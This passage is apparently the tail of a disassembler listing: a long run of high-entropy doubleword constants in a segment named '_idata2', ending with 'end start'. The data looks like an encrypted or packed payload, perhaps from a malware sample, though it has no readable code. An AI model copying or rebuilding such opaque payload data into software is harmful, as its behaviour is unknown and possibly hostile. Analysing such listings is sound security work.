dd 0B41A3120h, 0FCA2E8ADh, 0FC41FC29h, 8C32C61Fh, 2AC7C075h
dd 3C728FD9h, 9BF67786h, 0CA6BE349h, 928FB746h, 0B74901EDh
dd 0C41EE91Bh, 3BA0D7D6h, 14BA6BDCh, 0B416C566h, 5BB50639h
dd 457A5F46h, 522577C2h, 1A372F3Eh, 4FC18965h, 9237EBD9h
dd 7FFAE867h, 600A796Eh, 0D0BBBD19h, 2CD68076h, 666EC87Eh
dd 42A2397Eh, 0C12F3C6h, 0E7F6D496h, 7FC29D26h, 59759B81h
dd 248A4C1Fh, 6C12C07Eh, 9DA42CBh, 0FCE26429h, 0FCABEC4Eh
dd 451BF8BFh, 0E0518DD4h, 0F8027066h, 4FAFB26Dh, 7524082h
dd 7E30F94Eh, 7CD6BFC3h, 0C49A728Eh, 0F859A5DCh, 7210685Eh
dd 0ABFF52DEh, 0E47EC92Bh, 0EC9250F6h, 84DDFC3Eh, 0C4447ACFh
dd 6F0CE4BBh, 3F1888A6h, 0E973039Eh, 9C02C924h, 0D0BBBD19h
dd 2CF28076h, 7D6FC87Eh, 39684876h, 4EA6C27h, 0CD4AC6FCh
dd 0A5BF1F5Eh, 9C8270D2h, 50CA782Eh, 44D64075h, 8073ADB4h
dd 57C45046h, 7D6C25C7h, 7B99E0D6h, 944E195Bh, 1CC27026h
dd 0D403CD2Eh, 85D702E6h, 5E9A08CAh, 8D315B1h, 84AAD8CEh
dd 0C70720D6h, 91B0D0AEh, 5C42844Ch, 0C2771304h, 1B8A714Eh
dd 74EEB9BBh, 7C23D086h, 74686CCEh, 26176A3Fh, 94FAE86Ah
dd 3948F342h, 0E4CA0CC4h, 94B42B50h, 0F1ED38FFh, 0BC2224F7h
dd 4AA5A0Eh, 8446A223h, 0A0104D94h, 77E430A6h, 1D68C5A7h
dd 50AAC036h, 1F5A089Ah, 0C893D5F1h, 44E2980Eh, 0E046E096h
dd 0E04BAD29h, 18C27066h, 6F7FB86Eh, 2958B806h, 0F4DA7CD5h
dd 0CBAF7BECh, 0C41EE90Bh, 0CC7A20D6h, 72AB1D1Eh, 56E233DEh
dd 0E47ED30Bh, 0DF3926F6h, 213122FEh, 640B68E0h, 0F041BDC4h
dd 0E8726056h, 7F5FA25Dh, 0FA42B092h, 0D50FCF45h, 2CD2C002h
dd 121AC86Eh, 0C8A2917Eh, 0C6ED80Dh, 78D9055Ch, 3F5CE8DEh
dd 0F30786E9h, 8FCA381Ah, 58234581h, 0B45A08FEh, 0F5D61006h
dd 0C1E8C8FEh, 8C72D4BFh, 0E5FFDF74h, 1CC23012h, 0D40AB84Eh
dd 0A8507530h, 0AD5C5FAh, 8CB35CCh, 9A3D8CEh, 0CC32195Ch
dd 0E83AC378h, 0EC05C563h, 5B0578AEh, 6965EAB6h, 349ABC0Fh
dd 7C229086h, 0F50CA0A8h, 25066263h, 4C4A0338h, 0A86975ACh
dd 44A38AEh, 0A4622A35h, 402B4D89h, 3C621086h, 6DF580Eh
dd 0E97826E6h, 947ADCB7h, 20029B80h, 94CD0D2Bh, 935D4076h
dd 31ADA2FEh, 0FCE26437h
dd 44EB984Eh, 0CC82EBE3h, 0E053ADD4h, 0F7687066h, 0E7B2DE61h
dd 85F70A76h, 929A08CAh, 96E320EDh, 0B01B5D79h, 0CC722096h
dd 3BCF681Ch, 68333591h, 0A44AF8EEh, 0F6E740F2h, 0B1D0488Eh
dd 7C62E4ADh, 0F05ABD44h, 0EC736056h, 3242CE4Eh, 9CF25B27h
dd 0A43A3005h, 18F9053Ch, 83B0C83Eh, 0FC562143h, 0CAA580Eh
dd 2AE2D556h, 9ED26B26h, 9CB61A43h, 94611E2Eh, 0DC1A2B77h
dd 9EDF02F6h, 56A21032h, 70DB1DB9h, 8C32E0D6h, 0A1CB28CEh
dd 0A4A45553h, 0C10040EDh, 0AC12349Ch, 34A9E398h, 0B65FB9ECh
dd 732A98B7h, 8C461153h, 34BA681Eh, 0ED1DC566h, 0C25113D9h
dd 0E68A494Eh, 74EEA29Bh, 7FC61086h, 0F040BDC4h, 0A7D46056h
dd 6D701577h, 5DC8F0E6h, 0DD009D64h, 87B48076h, 0F11890CEh
dd 0BC2224EFh, 352FAFA4h, 4FF2E062h, 9B3BE89Eh, 0DC82B762h
dd 40ADC02Eh, 0E199E6FDh, 0B41A3C8Fh, 0FCA2A187h, 851D9A4Eh
dd 8F32E096h, 0B3C22DABh, 0B7ECF742h, 640AB8D6h, 0D9F966B6h
dd 7F222EF8h, 8449F6A3h, 82A5BFEAh, 0AAB2137Dh, 253F9FB5h
dd 5C02F052h, 0D14BF8AEh, 0DD17B7B6h, 34DAC80Ah, 82AD086h
dd 49D27EE8h, 3D37977Ah, 54FAE86Ah, 9340F0A6h, 580F97Bh
dd 0E5562B50h, 0CC7CC00Bh, 170414E2h, 0C1A4BE5h, 2AFC4BFCh
dd 9667B026h, 9CB61B63h, 0CF611E2Eh, 0C6DB7075h, 806B8D49h
dd 0FCA25046h, 649E184Eh, 918E726h, 0D43A1CF7h, 11D890E7h
dd 642EB0E7h, 987BA5B4h, 105A48BEh, 38261045h, 2E4B6825h
dd 2C8D98B0h, 2093CD14h, 0F764B026h, 907B7D59h, 0ECB240B6h
dd 67AE883Eh, 48135571h, 0C46A188Eh, 1C64016h, 54F96FA9h
dd 9936F0A6h, 0F20A85Eh, 0A7150BC5h, 34234AF3h, 35A33BC6h
dd 5C1AA44Fh, 78DB255Ch, 6390E8DEh, 9CB60163h, 64CA782Eh
dd 0A1EB476h, 0BE995806h, 0BC967983h, 22E0734Eh, 86D21F2Eh
dd 944E017Bh, 0EB691626h, 243E89EBh, 0AC5203B6h, 3E93CFFh
dd 7CD6A1C3h, 842AD88Eh, 3B7F54F6h, 14BA6BD9h, 0EC07C466h
dd 57A1523Eh, 69198F7Dh, 349AB1A4h, 34AB18ADh, 33A32B32h
dd 4C865193h, 0D4FAA85Eh, 114C85A6h, 0A4BE116Bh, 6CDA0A36h
dd 71931FEh, 71669D3Eh, 4BA7C4Ah, 0FCFA4097h, 92D94315h
dd 1CB38880h, 9CACD348h, 0D47A40F9h, 0B65A08BEh, 0A40936E7h
dd 31231DE5h, 0BD8A8690h, 64D14E1Eh, 994FDAE5h, 644A8C52h
dd 98638541h, 0F49A48BEh, 3A978046h, 0DCD2F3D9h, 9FF9393Dh
dd 3F424336h, 0FE8F3BB6h, 0A54AB897h, 0ACABC263h, 0BFE3893Eh
dd 0F526F4C2h, 847A7573h, 8A0FEB16h, 7FFAE867h, 0DC7B7223h
dd 0D50FCFEEh, 6CD2C002h, 1AC87Eh, 17BAE7C4h, 52AA5CCCh
dd 0E24F2301h, 943AA8A7h, 0DD5BB4E9h, 2922782Eh, 2712C076h
dd 0F1145AFBh, 0D290634Ah, 44A6D40Ah, 0B9BA7569h, 51F3289Eh
dd 1C824998h, 5852333Dh, 0DFADD8B5h, 0C0D9C3D6h, 0C3146CAEh
dd 22BF5371h, 977260EFh, 9DB62A1Dh, 1C3B72E3h, 0AC08FBAEh
dd 0D554C57Fh, 4751887Eh, 0FC912FAEh, 2C6A18CEh, 0F34D96C3h
dd 6D5C15D5h, 7414F0E6h, 1B75CE27h, 157415BDh, 3E91C83Eh
dd 0B02813CEh, 0ED299625h, 2C7AAF53h, 9B3AE89Fh, 0DC836A62h
dd 8E7F7B2Eh, 6F12804Fh, 0F4637A0Bh, 149EFC06h, 44481D41h
dd 0CABFE096h, 0A6FF03DAh, 1FC2301Fh, 0E2E2E868h, 2FADFF40h
dd 0B4A3EE43h, 37979046h, 8B269FB5h, 0CC733B55h, 2DB6831Eh
dd 1C3B16F3h, 0A9CFF7AEh, 0EF9240F7h, 74E3FABBh, 44A3B686h
dd 41653D31h, 0CB260EAh, 7FF8E8D5h, 7412C4E5h, 1B75CEA7h
dd 15743D0Fh, 0F115C83Eh, 0BC621022h, 3D00DD0Dh, 0C9F1A016h
dd 947AD1ECh, 9BA9306Dh, 0E9487722h, 5712C076h, 375500F9h
dd 0FCA250C2h, 47E858CDh, 931F4D1h, 0D43A11ACh, 0A93D2074h
dd 644A81D0h, 991A9549h, 71C048BEh, 8B679F86h, 6D2AD88Eh
dd 0CC72204Ah, 91B59722h, 5C02B0F2h, 0AB5FC62Eh, 0EC92CB73h
dd 359C033Eh, 2C1693ADh, 3B9FC026h, 0AA0F59E9h, 21FAE867h
dd 36C7F3D1h, 0E78A78D7h, 6CEBF2B3h, 0BE9F417Eh, 376250FFh
dd 0C62F630Eh, 3EF2E06Fh, 52BFD396h, 0AE8270DFh, 24CA4547h
dd 5B60B076h, 0B45A1756h, 0ECDD06h, 46C159C5h, 0B722A295h
dd 9443E25Bh, 9FCE0526h, 55F5A8AAh, 0B0764439h, 3781A39Fh
dd 57015C9h, 0F4AD8CEh, 8C4B5263h, 0E2CC801Eh, 0F5634F99h
dd 244AF8AEh, 0ABB94E83h, 0FD3FA32h, 0FE2DD8C1h, 3B95E7F2h
dd 0BE376F5Fh, 0DF0557A0h, 3BC3D49Ah, 0E48A1CDFh, 532D7FC9h
dd 3E9BF495h, 0BC6270E2h, 0C49916EEh, 0CBD6ACDDh, 0D403461Bh
dd 0E93BBDE6h, 27CA780Ah, 2C2BB2F3h, 11FF6EBEh, 0FF647B48h
dd 6C18C0Ch, 7774269Ah, 86FBEF36h, 19C27026h, 0ED0AB86Eh
dd 0F20DFCF0h, 0BA2FC53Dh, 6AE2D07Eh, 0B1564D71h, 34F12096h
dd 0AF3E67E1h, 0D502B066h, 0E473AA2Bh, 0BA922AF6h, 16E1DC1h
dd 0BCA7D0C6h, 0C4CE9CC1h, 0CC996016h, 5790F80Eh, 0F4439AF6h
dd 248A38EEh, 70477F60h, 0F71A884Bh, 386DEF3Eh, 4AA5D30h
dd 75A425DFh, 19B7E8DEh, 0DCC209BCh, 1DA8EDA3h, 3E43C036h
dd 4B0A08D4h, 0BC97D493h, 0BB121B4Eh, 893E6499h, 0D41028DEh
dd 2594C5D9h, 0F1F5B82Eh, 0AC123536h, 0FB65B07Dh, 3CE665C2h
dd 0EEAF518Eh, 0FF7260EFh, 45796BD7h, 5868E136h, 0F2FF07FFh
dd 139200CFh, 74EFE8ABh, 73E25586h, 0C46EC94Ah, 857B5316h
dd 14C3C6DBh, 0CD13A1A6h, 0EB8A2786h, 0B92DD036h, 745AFDDEh
dd 386DD043h, 4AA5C84h, 758025DFh, 2CF9E8DEh, 0DC82592Bh
dd 0D3F233A5h, 2C26F1F3h, 0B45A08BEh, 0FFA42516h, 4FAF5CBh
dd 8FE0D396h, 238BDF1Fh, 6647F9C7h, 0DC0AF857h, 0AC52248Dh
dd 0F7A60375h, 7CF2FDC3h, 87F8EB8Eh, 3B83D717h, 623FE1FFh
dd 9F02F05Fh, 0A2014FA1h, 61A7A30Fh, 83D5906Dh, 0AC21C4C5h
dd 0ECAB7387h, 3633B015h, 3A93DF01h, 1F5F845Fh, 968B3494h
dd 10990BD6h, 770E8AF5h, 0F8EF0084h, 0DD5DA746h, 0C9C96175h
dd 947AD1F4h, 0F8D6BB25h, 0AB0A4B3Eh, 6C1278F4h, 7BD1CBBEh
dd 412F5BEDh, 44AAA000h, 0BFED6B6Ah, 0B5468417h, 66FE7654h
dd 4426BA19h, 0D80E3C1Ch, 80B47412h, 49E2AC9Bh, 0FE33B66h
dd 94371DD7h, 1FCE685Bh, 0E41E35Bh, 97CFF7AEh, 676DBF09h
dd 7D8DB53Dh, 0F82D93C8h, 3B95E7E8h, 59F1372Bh, 4F7EA710h
dd 0A1BD0F59h, 0D6B97BB9h, 0D3C20439h, 24273781h, 0B32D4495h
dd 0FB555D8Ah, 0A42993A9h, 6BC516B3h, 227AB4E9h, 0F6F987D1h
dd 6C12D69Eh, 4B35E0BEh, 0FC4AAFF9h, 19EA984Eh, 0A3B80D17h
dd 0E993289Eh, 78C27025h, 0D1818A91h, 0AC1239C4h, 92B8C19Ah
dd 66AFAEC7h, 870C5D81h, 92F920D6h, 72646B22h, 19528BE7h
dd 0A75C7DA1h, 0AF6540F6h, 34FA8828h, 75A7DF86h, 326A18CDh
dd 87B03C55h, 0D0F58810h, 9C42F25Ah, 1D0B340Dh, 2CD28137h
dd 76F44E71h, 718A10C6h, 0B55A7F0h, 4CF043D4h, 8470639Eh
dd 648E7AE5h, 24CB782Eh, 86FC2827h, 216AF741h, 0FCE26429h
dd 0F1DAB8FFh, 8C72D4A6h, 1D8408B4h, 0F4D6087Eh, 9BF552BAh
dd 385DD233h, 0C5789B3Ch, 7CD6A1D3h, 0ECCF338Eh, 0CC7220D0h
dd 14BC0047h, 0B45AB066h, 5BB5121Ah, 0D8BBC57Ch, 0B05C887Eh
dd 3C16F9ACh, 0EDEF90CEh, 0EEB22022h, 657F5FBEh, 9442B092h
dd 918A38EEh, 76F003Fh, 751A884Ah, 3995D5B2h, 4EA6C3Fh
dd 4DF2A055h, 29BAF3EAh, 0DCC204CFh, 0A47A0C2Bh, 2C26EACBh
dd 132E0DBEh, 0C889ED86h
dd 30EF980Eh, 0BDB71708h, 0D47A68EAh, 68427026h, 4DB73867h
dd 0AE524082h, 5119C189h, 3CA2A9E8h, 70A5308Eh, 0C9ADF29h
dd 0FC4597E3h, 5C02B243h, 9D3C6525h, 327A40B6h, 3B2577C2h
dd 7C20DB02h, 0B6DF93CEh, 87B2202Fh, 8AF99400h, 63BF2F4Eh
dd 11083711h, 0ADD28037h, 747AEC34h, 42E9F0C6h, 7EA90E5Ch
dd 5C88A342h, 0A00B6D69h, 0DC8230A6h, 2ABF682Eh, 582E75FBh
dd 39D108FEh, 0FCE2406Bh, 0FDBD3CBDh, 8C32E999h, 0C47A9D53h
dd 0B9317066h, 66E9B8DFh, 29A5A445h, 0F4DA7CCFh, 2CE29046h
dd 84825C81h, 0BF8D20D6h, 0E5D58036h, 0C9894F99h, 0A40AC108h
dd 689D9273h, 34DA88ACh, 4550650Dh, 8EE1188Eh, 28F8E106h
dd 0B4FAA83Eh, 0EF4ABA8Dh, 0E7430BECh, 0A1E99444h, 745AD813h
dd 0AC0F9D4Dh, 52D8584Eh, 0CFD69CDDh, 0D42A853Bh, 7B0130E6h
dd 24CA7843h, 64684B76h, 0B75242BFh, 7755D7F1h, 4D31ECBh
dd 0BDB71796h, 947A68EAh, 68C27026h, 67124F6Ch, 9C7B0CC4h
dd 0CD34FD77h, 4F699006h, 731AD9A6h, 8C461153h, 14BA281Eh
dd 0AB00C466h, 10A2A9B6h, 0B56DBF0Ah, 47D984D5h, 7050FBAEh
dd 60994E9Fh, 0B93F3949h, 54BA9C62h, 0C21D5455h, 691809E1h
dd 2CD352B1h, 5B8FF27Eh, 0C96250F2h, 7C783108h, 0C4E09400h
dd 58D217CEh, 867DCF39h, 27C632A5h, 0E9E5D03Ch, 0B41A3C8Fh
dd 0ECA25006h, 31ECD9C3h, 22BF6985h, 0D77A68E7h, 5CD21DA3h
dd 9AD3B6Eh, 0AC5200B6h, 0BB20BD5h, 7CDBEEF3h, 0D6AD518Eh
dd 437220D6h, 914D4858h, 5C428457h, 244AF8AEh, 4C04782h
dd 0CB257119h, 0D2AF5BDCh, 276A58F7h, 24F9E915h, 0DFEAE2D5h
dd 0DC7B8623h, 0ECC001EEh, 665B8345h, 6458C976h, 0BC3A7345h
dd 3DD0DD85h, 709AA016h, 953AE8BAh, 0DDDB38A4h, 0B140286Dh
dd 6C52F459h, 806B8D49h, 0FCA25046h, 429E884Eh, 9C5F6D95h
dd 0D4CC289Eh, 28F3F5D1h, 640AB82Eh, 0B82700B4h, 716D8E00h
dd 3CA2A477h, 842ED88Eh, 79F826A3h, 14FA5C2Eh, 68333591h
dd 0E44AF8EEh, 0E7E740F6h, 0F6D88FB4h, 9EF4D22Ch, 4E63F339h
dd 0A6705211h, 0A3187E5Ch, 17262295h, 0E6055CCCh, 7A6F036Eh
dd 741A8847h, 47EA94C9h, 0B155A7F1h, 4CB29924h, 0A1FE7D61h
dd 697D30A6h, 248A4140h, 592E5589h, 39D708FEh, 0FCE2695Ch
dd 7D880DC3h, 0DE63E0D6h, 618528B4h, 1C824970h, 51B22D91h
dd 19AD00F6h, 0F4DA71A8h, 9DE05B9h, 31A7D8CEh, 0CC321898h
dd 2DE8DDE1h, 0A354B026h, 0E47F4C3Bh, 0BA37C3F6h, 34DAC807h
dd 7C223845h, 0AE3718CEh, 455FE117h, 0CFAE86Dh, 1983FF56h
dd 0E4CA2D6Eh, 0AF1140B3h, 7BEA37B6h, 0A9E29507h, 3969584Eh
dd 4CD8A046h, 155CF4EBh, 0B08E149Ah, 44D90D5Fh, 93ED049Eh
dd 5C5F7D41h, 35DAB78h, 0BB154AA6h, 731C8169h, 0E02C50F3h
dd 1CE7C834h, 8C6AB86Eh, 53ADFF13h, 0B011718Bh, 896FA062h
dd 846AE0C0h, 0AA7A705Dh, 16BC529Fh, 34549515h, 0A4B5F8AEh
dd 0ECF8847Dh, 0A125D86Ch, 7C62E57Eh, 4562DC4Dh, 338D3C28h
dd 0D7F9DD02h, 0B7AAF460h, 0C75C715h, 0D32D7F49h, 0A20B1Fh
dd 576210C6h, 485E0BFh, 5C1AA056h, 563AE89Eh, 0EC3A30C6h
dd 0CCCA782Eh, 6C12C075h, 395A2C7Ch, 31AE7452h, 44121B60h
dd 6452F9EAh, 0D47A28DEh, 2CE624ADh, 0E5103333h, 0EC66135Bh
dd 11A3A0FEh, 0FE836FB9h, 832BD88Ah, 0C97423D4h, 0B77377E4h
dd 0EF059DB5h, 0FBFAEB6Eh, 6Ah, 4Bh dup(0)
dd 1600h dup(?)
_idata2 ends
end start